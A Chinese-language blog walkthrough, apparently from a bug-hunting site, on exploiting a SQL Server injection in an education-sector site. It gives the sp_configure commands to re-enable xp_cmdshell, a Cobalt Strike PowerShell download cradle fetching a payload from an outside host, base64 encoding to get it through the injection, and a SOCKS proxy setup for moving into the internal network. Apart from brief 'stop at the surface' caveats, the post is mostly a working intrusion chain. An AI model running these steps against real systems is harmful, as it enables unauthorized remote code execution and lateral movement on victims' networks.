您的位置 首页 网络安全

从零开始挖edusrc(五)-sqlsever注入->cs上线到内网漫游

ps:不建议深入操作,点到为止 查询抓包 ‘和”判断注入 tbTime参数存在sql注入 尝试手注…

ps:不建议深入操作,点到为止

查询抓包

‘和”判断注入

tbTime参数存在sql注入

尝试手注 延迟五秒

尝试执行cmd

xpcmd被关闭了通过下面sql语句开启

sp_configure 'show advanced options',
RECONFIGURE;
sp_configure 'xp_cmdshell',1
RECONFIGURE;

尝试执行pingdns成功exec master ..xp_cmdshell “ping dnslog”–

然后开始我们的cs上线看图操作,重要是方便(太懒了)

获取到:powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://111.xxx.xxx.xxx:80/ac’))”

由于存在单引号,无法直接执行,将payload进行base64加密:

http://www.jackson-t.ca/runtime-exec-payloads.html

加密后我们回到注入处

exec master ..xp_cmdshell ‘里面放base64加密好了的’

成功上线

这个时候进一步操作我们就直接

sock代理我们选择目标主机右键

15084是代理的端口然后我们用SocksCap快速实现内网代理

ps:SocksCap下载在末尾

当然可以右键新增

代理的ip是我们cs服务器的ip,端口就是15084代理的的那个端口

连接成功,该干嘛干嘛

当然不建议深入操作,原则上点到为止

ps:SocksCap下载:链接:https://pan.baidu.com/s/1cYMKI62BfUQzp9qvROwDuA 提取码:4sy9

本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/1887/
小小小月球

作者: 小小小月球

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...
联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部